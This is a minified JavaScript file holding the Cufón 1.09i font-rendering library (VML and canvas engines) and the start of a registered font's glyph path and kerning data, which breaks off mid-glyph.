/*
 * Copyright (c) 2009 Simo Kinnunen.
 * Licensed under the MIT license.
 *
 * @version 1.09i
 */
var Cufon=(function(){var m=function(){return m.replace.apply(null,arguments)};var x=m.DOM={ready:(function(){var C=false,E={loaded:1,complete:1};var B=[],D=function(){if(C){return}C=true;for(var F;F=B.shift();F()){}};if(document.addEventListener){document.addEventListener("DOMContentLoaded",D,false);window.addEventListener("pageshow",D,false)}if(!window.opera&&document.readyState){(function(){E[document.readyState]?D():setTimeout(arguments.callee,10)})()}if(document.readyState&&document.createStyleSheet){(function(){try{document.body.doScroll("left");D()}catch(F){setTimeout(arguments.callee,1)}})()}q(window,"load",D);return function(F){if(!arguments.length){D()}else{C?F():B.push(F)}}})(),root:function(){return document.documentElement||document.body}};var n=m.CSS={Size:function(C,B){this.value=parseFloat(C);this.unit=String(C).match(/[a-z%]*$/)[0]||"px";this.convert=function(D){return D/B*this.value};this.convertFrom=function(D){return D/this.value*B};this.toString=function(){return this.value+this.unit}},addClass:function(C,B){var D=C.className;C.className=D+(D&&" ")+B;return C},color:j(function(C){var B={};B.color=C.replace(/^rgba\((.*?),\s*([\d.]+)\)/,function(E,D,F){B.opacity=parseFloat(F);return"rgb("+D+")"});return B}),fontStretch:j(function(B){if(typeof B=="number"){return B}if(/%$/.test(B)){return parseFloat(B)/100}return{"ultra-condensed":0.5,"extra-condensed":0.625,condensed:0.75,"semi-condensed":0.875,"semi-expanded":1.125,expanded:1.25,"extra-expanded":1.5,"ultra-expanded":2}[B]||1}),getStyle:function(C){var B=document.defaultView;if(B&&B.getComputedStyle){return new a(B.getComputedStyle(C,null))}if(C.currentStyle){return new a(C.currentStyle)}return new a(C.style)},gradient:j(function(F){var G={id:F,type:F.match(/^-([a-z]+)-gradient\(/)[1],stops:[]},C=F.substr(F.indexOf("(")).match(/([\d.]+=)?(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)/ig);for(var E=0,B=C.length,D;E<B;++E){D=C[E].split("=",2).reverse();G.stops.push([D[1]||E/(B-1),D[0]])}return G}),quotedList:j(function(E){var D=[],C=/\s*((["'])([\s\S]*?[^\\])\2|[^,]+)\s*/g,B;while(B=C.exec(E)){D.push(B[3]||B[1])}return D}),recognizesMedia:j(function(G){var E=document.createElement("style"),D,C,B;E.type="text/css";E.media=G;try{E.appendChild(document.createTextNode("/**/"))}catch(F){}C=g("head")[0];C.insertBefore(E,C.firstChild);D=(E.sheet||E.styleSheet);B=D&&!D.disabled;C.removeChild(E);return B}),removeClass:function(D,C){var B=RegExp("(?:^|\\s+)"+C+"(?=\\s|$)","g");D.className=D.className.replace(B,"");return D},supports:function(D,C){var B=document.createElement("span").style;if(B[D]===undefined){return false}B[D]=C;return B[D]===C},textAlign:function(E,D,B,C){if(D.get("textAlign")=="right"){if(B>0){E=" "+E}}else{if(B<C-1){E+=" "}}return E},textShadow:j(function(F){if(F=="none"){return null}var E=[],G={},B,C=0;var D=/(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)|(-?[\d.]+[a-z%]*)|,/ig;while(B=D.exec(F)){if(B[0]==","){E.push(G);G={};C=0}else{if(B[1]){G.color=B[1]}else{G[["offX","offY","blur"][C++]]=B[2]}}}E.push(G);return E}),textTransform:(function(){var B={uppercase:function(C){return C.toUpperCase()},lowercase:function(C){return C.toLowerCase()},capitalize:function(C){return C.replace(/\b./g,function(D){return D.toUpperCase()})}};return function(E,D){var C=B[D.get("textTransform")];return C?C(E):E}})(),whiteSpace:(function(){var D={inline:1,"inline-block":1,"run-in":1};var C=/^\s+/,B=/\s+$/;return function(H,F,G,E){if(E){if(E.nodeName.toLowerCase()=="br"){H=H.replace(C,"")}}if(D[F.get("display")]){return H}if(!G.previousSibling){H=H.replace(C,"")}if(!G.nextSibling){H=H.replace(B,"")}return H}})()};n.ready=(function(){var B=!n.recognizesMedia("all"),E=false;var D=[],H=function(){B=true;for(var K;K=D.shift();K()){}};var I=g("link"),J=g("style");function C(K){return K.disabled||G(K.sheet,K.media||"screen")}function G(M,P){if(!n.recognizesMedia(P||"all")){return true}if(!M||M.disabled){return false}try{var Q=M.cssRules,O;if(Q){search:for(var L=0,K=Q.length;O=Q[L],L<K;++L){switch(O.type){case 2:break;case 3:if(!G(O.styleSheet,O.media.mediaText)){return false}break;default:break search}}}}catch(N){}return true}function F(){if(document.createStyleSheet){return true}var L,K;for(K=0;L=I[K];++K){if(L.rel.toLowerCase()=="stylesheet"&&!C(L)){return false}}for(K=0;L=J[K];++K){if(!C(L)){return false}}return true}x.ready(function(){if(!E){E=n.getStyle(document.body).isUsable()}if(B||(E&&F())){H()}else{setTimeout(arguments.callee,10)}});return function(K){if(B){K()}else{D.push(K)}}})();function s(D){var C=this.face=D.face,B={"\u0020":1,"\u00a0":1,"\u3000":1};this.glyphs=D.glyphs;this.w=D.w;this.baseSize=parseInt(C["units-per-em"],10);this.family=C["font-family"].toLowerCase();this.weight=C["font-weight"];this.style=C["font-style"]||"normal";this.viewBox=(function(){var F=C.bbox.split(/\s+/);var E={minX:parseInt(F[0],10),minY:parseInt(F[1],10),maxX:parseInt(F[2],10),maxY:parseInt(F[3],10)};E.width=E.maxX-E.minX;E.height=E.maxY-E.minY;E.toString=function(){return[this.minX,this.minY,this.width,this.height].join(" ")};return E})();this.ascent=-parseInt(C.ascent,10);this.descent=-parseInt(C.descent,10);this.height=-this.ascent+this.descent;this.spacing=function(L,N,E){var O=this.glyphs,M,K,G,P=[],F=0,J=-1,I=-1,H;while(H=L[++J]){M=O[H]||this.missingGlyph;if(!M){continue}if(K){F-=G=K[H]||0;P[I]-=G}F+=P[++I]=~~(M.w||this.w)+N+(B[H]?E:0);K=M.k}P.total=F;return P}}function f(){var C={},B={oblique:"italic",italic:"oblique"};this.add=function(D){(C[D.style]||(C[D.style]={}))[D.weight]=D};this.get=function(H,I){var G=C[H]||C[B[H]]||C.normal||C.italic||C.oblique;if(!G){return null}I={normal:400,bold:700}[I]||parseInt(I,10);if(G[I]){return G[I]}var E={1:1,99:0}[I%100],K=[],F,D;if(E===undefined){E=I>400}if(I==500){I=400}for(var J in G){if(!k(G,J)){continue}J=parseInt(J,10);if(!F||J<F){F=J}if(!D||J>D){D=J}K.push(J)}if(I<F){I=F}if(I>D){I=D}K.sort(function(M,L){return(E?(M>=I&&L>=I)?M<L:M>L:(M<=I&&L<=I)?M>L:M<L)?-1:1});return G[K[0]]}}function r(){function D(F,G){if(F.contains){return F.contains(G)}return F.compareDocumentPosition(G)&16}function B(G){var F=G.relatedTarget;if(!F||D(this,F)){return}C(this,G.type=="mouseover")}function E(F){C(this,F.type=="mouseenter")}function C(F,G){setTimeout(function(){var H=d.get(F).options;m.replace(F,G?h(H,H.hover):H,true)},10)}this.attach=function(F){if(F.onmouseenter===undefined){q(F,"mouseover",B);q(F,"mouseout",B)}else{q(F,"mouseenter",E);q(F,"mouseleave",E)}}}function u(){var C=[],D={};function B(H){var E=[],G;for(var F=0;G=H[F];++F){E[F]=C[D[G]]}return E}this.add=function(F,E){D[F]=C.push(E)-1};this.repeat=function(){var E=arguments.length?B(arguments):C,F;for(var G=0;F=E[G++];){m.replace(F[0],F[1],true)}}}function A(){var D={},B=0;function C(E){return E.cufid||(E.cufid=++B)}this.get=function(E){var F=C(E);return D[F]||(D[F]={})}}function a(B){var D={},C={};this.extend=function(E){for(var F in E){if(k(E,F)){D[F]=E[F]}}return this};this.get=function(E){return D[E]!=undefined?D[E]:B[E]};this.getSize=function(F,E){return C[F]||(C[F]=new n.Size(this.get(F),E))};this.isUsable=function(){return !!B}}function q(C,B,D){if(C.addEventListener){C.addEventListener(B,D,false)}else{if(C.attachEvent){C.attachEvent("on"+B,function(){return D.call(C,window.event)})}}}function v(C,B){var D=d.get(C);if(D.options){return C}if(B.hover&&B.hoverables[C.nodeName.toLowerCase()]){b.attach(C)}D.options=B;return C}function j(B){var C={};return function(D){if(!k(C,D)){C[D]=B.apply(null,arguments)}return C[D]}}function c(F,E){var B=n.quotedList(E.get("fontFamily").toLowerCase()),D;for(var C=0;D=B[C];++C){if(i[D]){return i[D].get(E.get("fontStyle"),E.get("fontWeight"))}}return null}function g(B){return document.getElementsByTagName(B)}function k(C,B){return C.hasOwnProperty(B)}function h(){var C={},B,F;for(var E=0,D=arguments.length;B=arguments[E],E<D;++E){for(F in B){if(k(B,F)){C[F]=B[F]}}}return C}function o(E,M,C,N,F,D){var K=document.createDocumentFragment(),H;if(M===""){return K}var L=N.separate;var I=M.split(p[L]),B=(L=="words");if(B&&t){if(/^\s/.test(M)){I.unshift("")}if(/\s$/.test(M)){I.push("")}}for(var J=0,G=I.length;J<G;++J){H=z[N.engine](E,B?n.textAlign(I[J],C,J,G):I[J],C,N,F,D,J<G-1);if(H){K.appendChild(H)}}return K}function l(D,M){var C=D.nodeName.toLowerCase();if(M.ignore[C]){return}var E=!M.textless[C];var B=n.getStyle(v(D,M)).extend(M);var F=c(D,B),G,K,I,H,L,J;if(!F){return}for(G=D.firstChild;G;G=I){K=G.nodeType;I=G.nextSibling;if(E&&K==3){if(H){H.appendData(G.data);D.removeChild(G)}else{H=G}if(I){continue}}if(H){D.replaceChild(o(F,n.whiteSpace(H.data,B,H,J),B,M,G,D),H);H=null}if(K==1){if(G.firstChild){if(G.nodeName.toLowerCase()=="cufon"){z[M.engine](F,null,B,M,G,D)}else{arguments.callee(G,M)}}J=G}}}var t=" ".split(/\s+/).length==0;var d=new A();var b=new r();var y=new u();var e=false;var z={},i={},w={autoDetect:false,engine:null,forceHitArea:false,hover:false,hoverables:{a:true},ignore:{applet:1,canvas:1,col:1,colgroup:1,head:1,iframe:1,map:1,optgroup:1,option:1,script:1,select:1,style:1,textarea:1,title:1,pre:1},printable:true,selector:(window.Sizzle||(window.jQuery&&function(B){return jQuery(B)})||(window.dojo&&dojo.query)||(window.Ext&&Ext.query)||(window.YAHOO&&YAHOO.util&&YAHOO.util.Selector&&YAHOO.util.Selector.query)||(window.$$&&function(B){return $$(B)})||(window.$&&function(B){return $(B)})||(document.querySelectorAll&&function(B){return document.querySelectorAll(B)})||g),separate:"words",textless:{dl:1,html:1,ol:1,table:1,tbody:1,thead:1,tfoot:1,tr:1,ul:1},textShadow:"none"};var p={words:/\s/.test("\u00a0")?/[^\S\u00a0]+/:/\s+/,characters:"",none:/^/};m.now=function(){x.ready();return m};m.refresh=function(){y.repeat.apply(y,arguments);return m};m.registerEngine=function(C,B){if(!B){return m}z[C]=B;return m.set("engine",C)};m.registerFont=function(D){if(!D){return m}var B=new s(D),C=B.family;if(!i[C]){i[C]=new f()}i[C].add(B);return m.set("fontFamily",'"'+C+'"')};m.replace=function(D,C,B){C=h(w,C);if(!C.engine){return m}if(!e){n.addClass(x.root(),"cufon-active cufon-loading");n.ready(function(){n.addClass(n.removeClass(x.root(),"cufon-loading"),"cufon-ready")});e=true}if(C.hover){C.forceHitArea=true}if(C.autoDetect){delete C.fontFamily}if(typeof C.textShadow=="string"){C.textShadow=n.textShadow(C.textShadow)}if(typeof C.color=="string"&&/^-/.test(C.color)){C.textGradient=n.gradient(C.color)}else{delete C.textGradient}if(!B){y.add(D,arguments)}if(D.nodeType||typeof D=="string"){D=[D]}n.ready(function(){for(var F=0,E=D.length;F<E;++F){var G=D[F];if(typeof G=="string"){m.replace(C.selector(G),C,true)}else{l(G,C)}}});return m};m.set=function(B,C){w[B]=C;return m};return m})();Cufon.registerEngine("vml",(function(){var e=document.namespaces;if(!e){return}e.add("cvml","urn:schemas-microsoft-com:vml");e=null;var b=document.createElement("cvml:shape");b.style.behavior="url(#default#VML)";if(!b.coordsize){return}b=null;var h=(document.documentMode||0)<8;document.write(('<style type="text/css">cufoncanvas{text-indent:0;}@media screen{cvml\\:shape,cvml\\:rect,cvml\\:fill,cvml\\:shadow{behavior:url(#default#VML);display:block;antialias:true;position:absolute;}cufoncanvas{position:absolute;text-align:left;}cufon{display:inline-block;position:relative;vertical-align:'+(h?"middle":"text-bottom")+";}cufon cufontext{position:absolute;left:-10000in;font-size:1px;}a cufon{cursor:pointer}}@media print{cufon cufoncanvas{display:none;}}</style>").replace(/;/g,"!important;"));function c(i,j){return a(i,/(?:em|ex|%)$|^[a-z-]+$/i.test(j)?"1em":j)}function a(l,m){if(m==="0"){return 0}if(/px$/i.test(m)){return parseFloat(m)}var k=l.style.left,j=l.runtimeStyle.left;l.runtimeStyle.left=l.currentStyle.left;l.style.left=m.replace("%","em");var i=l.style.pixelLeft;l.style.left=k;l.runtimeStyle.left=j;return i}function f(l,k,j,n){var i="computed"+n,m=k[i];if(isNaN(m)){m=k.get(n);k[i]=m=(m=="normal")?0:~~j.convertFrom(a(l,m))}return m}var g={};function d(p){var q=p.id;if(!g[q]){var n=p.stops,o=document.createElement("cvml:fill"),i=[];o.type="gradient";o.angle=180;o.focus="0";o.method="sigma";o.color=n[0][1];for(var m=1,l=n.length-1;m<l;++m){i.push(n[m][0]*100+"% "+n[m][1])}o.colors=i.join(",");o.color2=n[l][1];g[q]=o}return g[q]}return function(ac,G,Y,C,K,ad,W){var n=(G===null);if(n){G=K.alt}var I=ac.viewBox;var p=Y.computedFontSize||(Y.computedFontSize=new Cufon.CSS.Size(c(ad,Y.get("fontSize"))+"px",ac.baseSize));var y,q;if(n){y=K;q=K.firstChild}else{y=document.createElement("cufon");y.className="cufon cufon-vml";y.alt=G;q=document.createElement("cufoncanvas");y.appendChild(q);if(C.printable){var Z=document.createElement("cufontext");Z.appendChild(document.createTextNode(G));y.appendChild(Z)}if(!W){y.appendChild(document.createElement("cvml:shape"))}}var ai=y.style;var R=q.style;var l=p.convert(I.height),af=Math.ceil(l);var V=af/l;var P=V*Cufon.CSS.fontStretch(Y.get("fontStretch"));var U=I.minX,T=I.minY;R.height=af;R.top=Math.round(p.convert(T-ac.ascent));R.left=Math.round(p.convert(U));ai.height=p.convert(ac.height)+"px";var F=Y.get("color");var ag=Cufon.CSS.textTransform(G,Y).split("");var L=ac.spacing(ag,f(ad,Y,p,"letterSpacing"),f(ad,Y,p,"wordSpacing"));if(!L.length){return null}var k=L.total;var x=-U+k+(I.width-L[L.length-1]);var ah=p.convert(x*P),X=Math.round(ah);var O=x+","+I.height,m;var J="r"+O+"ns";var u=C.textGradient&&d(C.textGradient);var o=ac.glyphs,S=0;var H=C.textShadow;var ab=-1,aa=0,w;while(w=ag[++ab]){var D=o[ag[ab]]||ac.missingGlyph,v;if(!D){continue}if(n){v=q.childNodes[aa];while(v.firstChild){v.removeChild(v.firstChild)}}else{v=document.createElement("cvml:shape");q.appendChild(v)}v.stroked="f";v.coordsize=O;v.coordorigin=m=(U-S)+","+T;v.path=(D.d?"m"+D.d+"xe":"")+"m"+m+J;v.fillcolor=F;if(u){v.appendChild(u.cloneNode(false))}var ae=v.style;ae.width=X;ae.height=af;if(H){var s=H[0],r=H[1];var B=Cufon.CSS.color(s.color),z;var N=document.createElement("cvml:shadow");N.on="t";N.color=B.color;N.offset=s.offX+","+s.offY;if(r){z=Cufon.CSS.color(r.color);N.type="double";N.color2=z.color;N.offset2=r.offX+","+r.offY}N.opacity=B.opacity||(z&&z.opacity)||1;v.appendChild(N)}S+=L[aa++]}var M=v.nextSibling,t,A;if(C.forceHitArea){if(!M){M=document.createElement("cvml:rect");M.stroked="f";M.className="cufon-vml-cover";t=document.createElement("cvml:fill");t.opacity=0;M.appendChild(t);q.appendChild(M)}A=M.style;A.width=X;A.height=af}else{if(M){q.removeChild(M)}}ai.width=Math.max(Math.ceil(p.convert(k*P)),0);if(h){var Q=Y.computedYAdjust;if(Q===undefined){var E=Y.get("lineHeight");if(E=="normal"){E="1em"}else{if(!isNaN(E)){E+="em"}}Y.computedYAdjust=Q=0.5*(a(ad,E)-parseFloat(ai.height))}if(Q){ai.marginTop=Math.ceil(Q)+"px";ai.marginBottom=Q+"px"}}return y}})());Cufon.registerEngine("canvas",(function(){var b=document.createElement("canvas");if(!b||!b.getContext||!b.getContext.apply){return}b=null;var a=Cufon.CSS.supports("display","inline-block");var e=!a&&(document.compatMode=="BackCompat"||/frameset|transitional/i.test(document.doctype.publicId));var f=document.createElement("style");f.type="text/css";f.appendChild(document.createTextNode(("cufon{text-indent:0;}@media screen,projection{cufon{display:inline;display:inline-block;position:relative;vertical-align:middle;"+(e?"":"font-size:1px;line-height:1px;")+"}cufon cufontext{display:-moz-inline-box;display:inline-block;width:0;height:0;overflow:hidden;text-indent:-10000in;}"+(a?"cufon canvas{position:relative;}":"cufon canvas{position:absolute;}")+"}@media print{cufon{padding:0;}cufon canvas{display:none;}}").replace(/;/g,"!important;")));document.getElementsByTagName("head")[0].appendChild(f);function d(p,h){var n=0,m=0;var g=[],o=/([mrvxe])([^a-z]*)/g,k;generate:for(var j=0;k=o.exec(p);++j){var l=k[2].split(",");switch(k[1]){case"v":g[j]={m:"bezierCurveTo",a:[n+~~l[0],m+~~l[1],n+~~l[2],m+~~l[3],n+=~~l[4],m+=~~l[5]]};break;case"r":g[j]={m:"lineTo",a:[n+=~~l[0],m+=~~l[1]]};break;case"m":g[j]={m:"moveTo",a:[n=~~l[0],m=~~l[1]]};break;case"x":g[j]={m:"closePath"};break;case"e":break generate}h[g[j].m].apply(h,g[j].a)}return g}function c(m,k){for(var j=0,h=m.length;j<h;++j){var g=m[j];k[g.m].apply(k,g.a)}}return function(V,w,P,t,C,W){var k=(w===null);if(k){w=C.getAttribute("alt")}var A=V.viewBox;var m=P.getSize("fontSize",V.baseSize);var B=0,O=0,N=0,u=0;var z=t.textShadow,L=[];if(z){for(var U=z.length;U--;){var F=z[U];var K=m.convertFrom(parseFloat(F.offX));var I=m.convertFrom(parseFloat(F.offY));L[U]=[K,I];if(I<B){B=I}if(K>O){O=K}if(I>N){N=I}if(K<u){u=K}}}var Z=Cufon.CSS.textTransform(w,P).split("");var E=V.spacing(Z,~~m.convertFrom(parseFloat(P.get("letterSpacing"))||0),~~m.convertFrom(parseFloat(P.get("wordSpacing"))||0));if(!E.length){return null}var h=E.total;O+=A.width-E[E.length-1];u+=A.minX;var s,n;if(k){s=C;n=C.firstChild}else{s=document.createElement("cufon");s.className="cufon cufon-canvas";s.setAttribute("alt",w);n=document.createElement("canvas");s.appendChild(n);if(t.printable){var S=document.createElement("cufontext");S.appendChild(document.createTextNode(w));s.appendChild(S)}}var aa=s.style;var H=n.style;var j=m.convert(A.height);var Y=Math.ceil(j);var M=Y/j;var G=M*Cufon.CSS.fontStretch(P.get("fontStretch"));var J=h*G;var Q=Math.ceil(m.convert(J+O-u));var o=Math.ceil(m.convert(A.height-B+N));n.width=Q;n.height=o;H.width=Q+"px";H.height=o+"px";B+=A.minY;H.top=Math.round(m.convert(B-V.ascent))+"px";H.left=Math.round(m.convert(u))+"px";var r=Math.max(Math.ceil(m.convert(J)),0)+"px";if(a){aa.width=r;aa.height=m.convert(V.height)+"px"}else{aa.paddingLeft=r;aa.paddingBottom=(m.convert(V.height)-1)+"px"}var X=n.getContext("2d"),D=j/A.height;X.scale(D,D*M);X.translate(-u,-B);X.save();function T(){var x=V.glyphs,ab,l=-1,g=-1,y;X.scale(G,1);while(y=Z[++l]){var ab=x[Z[l]]||V.missingGlyph;if(!ab){continue}if(ab.d){X.beginPath();if(ab.code){c(ab.code,X)}else{ab.code=d("m"+ab.d,X)}X.fill()}X.translate(E[++g],0)}X.restore()}if(z){for(var U=z.length;U--;){var F=z[U];X.save();X.fillStyle=F.color;X.translate.apply(X,L[U]);T()}}var q=t.textGradient;if(q){var v=q.stops,p=X.createLinearGradient(0,A.minY,0,A.maxY);for(var U=0,R=v.length;U<R;++U){p.addColorStop.apply(p,v[U])}X.fillStyle=p}else{X.fillStyle=P.get("color")}T();return s}})());
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"54,-214v0,-139,114,-270,244,-268v51,0,99,10,145,29r-80,376v23,-7,44,-18,65,-33r33,54v-47,40,-110,67,-191,68v-130,1,-216,-94,-216,-226xm128,-212v-1,94,55,154,152,150r73,-343v-127,-33,-225,81,-225,193","w":497},{"d":"319,-397v72,12,134,75,142,152r26,243r-82,8r-26,-242v-5,-54,-51,-99,-110,-98r-80,0r-71,334r-84,0r145,-680r84,0r-62,291r336,-300r55,61","w":556,"k":{"y":10,"x":-10,"w":40,"v":40,"u":14,"q":20,"p":10,"o":22,"n":12,"g":8,"f":10,"e":22,"d":20,"c":22,"a":22,"Y":6,"W":8,"V":8,"U":16,"T":12,"Q":30,"O":30,"G":30,"C":30,"A":-8}},{"d":"482,-253v0,127,-96,256,-218,253v-42,0,-81,-11,-116,-32r-54,250r-80,0r129,-602v-23,9,-46,20,-68,35r-31,-55v57,-45,133,-77,227,-78v124,0,211,101,211,229xm404,-253v0,-105,-68,-172,-177,-152r-64,302v27,21,57,32,92,32v82,1,149,-93,149,-182","w":530},{"d":"114,-669r64,-23r249,681r-65,23","w":487},{"d":"432,-363v1,114,-170,226,-297,218v22,84,145,109,212,48r35,54v-32,31,-77,54,-135,55v-118,-1,-197,-95,-197,-219v0,-137,115,-275,244,-275v80,0,137,45,138,119xm356,-360v2,-30,-22,-50,-52,-50v-92,-1,-184,100,-178,200v95,-5,225,-70,230,-150","w":458},{"d":"328,-696r9,70v-79,6,-98,82,-109,156r77,0r-14,70r-78,0r-109,510r-78,0r108,-510r-51,0r14,-70r52,0v15,-72,23,-137,73,-180v31,-26,65,-43,106,-46","w":292,"k":{"a":10}},{"d":"134,-470r79,0r-100,470r-79,0xm151,-599v0,-26,24,-50,50,-50v26,0,50,24,50,50v0,26,-24,50,-50,50v-26,0,-50,-24,-50,-50","w":241},{"d":"431,-692v166,0,292,133,292,305v0,193,-138,366,-308,386v90,18,200,12,278,-21r4,73v-283,99,-619,-73,-619,-344v0,-200,164,-399,353,-399xm434,-616v-144,0,-274,169,-274,323v0,128,83,229,207,229v144,0,274,-169,274,-323v0,-128,-83,-229,-207,-229","w":763,"k":{"z":-5,"r":-5,"q":-5,"p":-8,"o":-5,"m":-5,"g":-10,"e":-5,"d":-8,"c":-5,"a":-5,"Y":54,"W":72,"V":72,"T":30,"O":-6,"L":-6,"J":-15,"C":-12}},{"d":"246,-603r-42,198r218,0r-16,77r-218,0r-70,328r-84,0r145,-680r316,0r-17,77r-232,0","w":453,"k":{"z":10,"y":8,"x":40,"w":20,"v":20,"u":8,"t":8,"s":12,"r":32,"q":15,"p":5,"o":15,"n":5,"m":32,"g":20,"e":15,"d":8,"c":15,"a":15,"Z":10,"W":-10,"V":-10,"U":5,"T":-12,"O":20,"M":24,"J":18,"A":72,".":70,",":70}},{"d":"328,-272r184,0r-16,74r-184,0r-42,198r-80,0r42,-198r-184,0r16,-74r184,0r42,-198r80,0","w":548},{"d":"481,-377r-238,398r-135,-698r81,-15r94,497r238,-403r76,403r293,-497r70,42r-403,671","w":888,"k":{"z":10,"y":18,"x":32,"w":6,"v":6,"u":18,"t":10,"s":24,"r":24,"q":44,"p":10,"o":48,"n":20,"m":24,"g":38,"f":16,"e":48,"d":45,"c":48,"a":48,"Z":10,"Y":-12,"W":-5,"V":-5,"T":-12,"S":-8,"Q":8,"O":8,"M":16,"G":8,"C":8,"A":78,".":52,",":52}},{"d":"156,-205v-19,78,43,141,112,141v53,0,105,-12,154,-36r124,-580r84,0r-132,620v-60,42,-135,71,-230,72v-121,2,-219,-105,-192,-233r98,-459r83,0","w":608,"k":{"Z":6,"A":6}},{"d":"341,-603r-129,603r-84,0r129,-603r-157,0r16,-77r398,0r-16,77r-157,0","w":430,"k":{"z":28,"y":36,"x":54,"w":34,"v":34,"u":36,"t":24,"s":36,"r":40,"q":58,"p":32,"o":60,"n":36,"m":40,"g":56,"e":60,"d":54,"c":60,"a":60,"\\":-5,"Y":-38,"X":-14,"W":-26,"V":-26,"U":-10,"T":-14,"S":-12,"Q":20,"O":20,"M":15,"G":20,"D":-10,"C":20,"B":-16,"A":60,".":54,",":54}},{"d":"360,-362v-23,-50,-106,-55,-144,-8v-20,24,-34,49,-40,80r-61,290r-81,0r102,-477r41,66v48,-61,115,-85,185,-47v20,11,35,28,46,48","w":396,"k":{"r":17,"g":10,"e":20,"a":20}},{"d":"42,68r173,-816r94,0r54,68r-86,0r-145,680r86,0r-82,68r-94,0","w":297},{"d":"179,-680r84,0r-145,680r-84,0","w":241},{"d":"332,-349v-4,-87,-152,-63,-188,-18r-40,-56v35,-35,82,-59,149,-59v88,-1,153,49,156,133v3,80,-123,153,-186,198r-109,77r237,0r-16,74r-328,0v25,-127,56,-130,175,-212v62,-43,98,-67,106,-74v29,-24,44,-45,44,-63","w":441},{"d":"108,-98v42,30,102,47,171,39r26,-121r79,0r-65,304r-79,0r24,-114v-114,11,-203,-38,-259,-102r323,-400r57,51","w":455},{"d":"361,-621r-107,83r-36,-46r162,-134r100,155r-47,35","w":552},{"d":"231,12v-105,1,-194,-95,-169,-211r58,-271r80,0r-62,288v-16,91,61,139,157,116r86,-404r80,0r-82,383v21,-7,48,-20,68,-31r34,52v-64,45,-148,77,-250,78"},{"d":"134,-77r237,0r-16,77r-321,0r145,-680r84,0","w":420,"k":{"y":32,"w":78,"v":78,"u":36,"t":12,"s":10,"q":38,"p":16,"o":42,"n":20,"f":10,"e":42,"d":42,"c":42,"a":42,"Y":116,"W":108,"V":108,"U":42,"T":75,"S":16,"Q":72,"O":48,"G":72,"C":72,"A":-16}},{"d":"153,0v11,-186,-32,-332,-103,-452r66,-37v55,101,90,211,104,330r195,-323r66,41r-275,441r-53,0","w":447},{"d":"140,-380v-24,11,-43,19,-65,34r-33,-51v61,-49,144,-84,246,-85v105,-1,194,95,169,211r-58,271r-80,0r62,-288v15,-91,-61,-139,-157,-115r-86,403r-80,0","w":505},{"d":"-38,175v29,-21,47,-50,55,-86r119,-559r79,0r-120,570v-12,61,-47,107,-93,136xm153,-599v0,-26,24,-50,50,-50v26,0,50,24,50,50v0,26,-24,50,-50,50v-26,0,-50,-24,-50,-50","w":243},{"d":"52,-195v0,-206,222,-356,424,-257r-144,674r-80,0r53,-249v-25,18,-54,27,-88,27v-104,-2,-165,-83,-165,-195xm130,-192v0,89,63,146,147,112v17,-6,32,-16,46,-29r62,-293v-138,-31,-255,77,-255,210","w":511},{"d":"160,-293v0,128,84,230,207,229v41,0,82,-11,123,-34r42,-201r-164,0r16,-74r245,0r-66,316v-61,46,-125,69,-193,69v-166,0,-292,-133,-292,-305v0,-235,222,-477,468,-375v37,16,70,41,98,73r-47,51v-41,-48,-96,-72,-163,-72v-144,-2,-274,169,-274,323","w":668},{"w":225},{"d":"153,0v11,-186,-32,-332,-103,-452r66,-37v55,101,90,211,104,330r165,-273v39,87,64,178,75,273r195,-323r66,41r-275,441r-53,0v6,-95,-2,-178,-24,-262r-163,262r-53,0","w":687},{"d":"128,-203v0,77,53,141,126,141v92,0,170,-107,170,-205v0,-77,-53,-141,-126,-141v-92,0,-170,107,-170,205xm298,-482v116,0,204,94,204,214v0,141,-115,280,-248,280v-116,0,-204,-94,-204,-214v0,-141,115,-280,248,-280","w":546},{"d":"307,-115v0,-75,-63,-116,-148,-108r-47,223r-78,0r147,-692r78,0r-86,406r239,-200r44,55r-186,147v66,20,113,74,117,155r6,115r-78,21","w":472},{"d":"283,-669v75,-83,222,-69,288,5r22,-28r53,44r-533,659r-53,-44r485,-600v-68,-41,-149,-46,-226,-14v19,18,32,44,32,80v0,80,-66,152,-139,151v-62,0,-111,-49,-111,-114v0,-91,88,-176,182,-139xm486,-205v-34,0,-70,46,-70,85v0,34,21,62,52,62v36,0,72,-47,72,-89v0,-30,-25,-59,-54,-58xm489,-262v64,0,114,47,114,111v0,80,-66,152,-139,151v-62,0,-111,-49,-111,-114v0,-77,66,-148,136,-148xm234,-621v-34,0,-70,46,-70,85v0,34,21,62,52,62v36,0,72,-47,72,-89v0,-30,-25,-59,-54,-58","w":656},{"d":"544,-700r63,51r-247,303r150,331r-75,33r-130,-297r-241,299r-64,-52r269,-327r-139,-306r74,-33r119,272","w":565,"k":{"z":-6,"y":16,"w":38,"v":38,"u":18,"q":22,"p":10,"o":26,"n":10,"g":10,"f":12,"e":26,"d":24,"c":26,"a":26,"U":8,"Q":24,"O":24,"G":24,"F":5,"D":-10,"C":24,"A":-10}},{"d":"262,-410v-63,-1,-118,55,-118,122v0,53,33,98,79,99v63,1,118,-55,118,-122v0,-53,-33,-98,-79,-99xm-40,108v0,-68,80,-102,151,-117v-42,-14,-63,-92,-7,-110r42,-18v-45,-27,-78,-81,-78,-152v0,-144,175,-249,289,-159r69,-56r46,58r-71,57v29,70,16,150,-28,201v-45,52,-138,80,-213,108v-11,4,-12,19,-3,26v15,10,49,25,103,45v81,29,121,68,121,117v0,157,-421,172,-421,0xm167,162v74,0,182,-35,113,-90v-13,-11,-56,-30,-95,-30v-55,0,-142,25,-147,66v6,42,70,54,129,54","w":460},{"d":"204,-444v0,-107,-26,-193,-66,-270r53,-31v106,152,127,421,20,599v-51,85,-114,158,-196,211r-35,-48v126,-97,224,-254,224,-461","w":326},{"d":"426,-456v12,-2,33,-7,62,-14r-443,660r-63,-42r359,-533v-36,4,-118,-26,-164,-26v-31,0,-60,8,-88,24r-27,-65v109,-72,230,14,364,-4","w":454},{"d":"180,-135v-17,70,5,128,36,171r-43,32v-60,-61,-85,-140,-67,-240v13,-67,42,-153,-10,-203v71,-24,74,-106,91,-181v20,-89,82,-161,160,-192r25,45v-76,41,-101,125,-119,223v-10,55,-51,98,-98,118v62,53,44,146,25,227","w":300},{"d":"146,-77r305,0r-16,77r-443,0r440,-603r-303,0r17,-77r438,0","w":514,"k":{"W":-10,"V":-10,"Q":10,"O":10,"G":12,"C":14,"B":-10}},{"d":"202,-1v-87,-18,-161,-109,-137,-219r54,-250r79,0r-58,272v-14,71,30,131,100,133v71,-129,123,-266,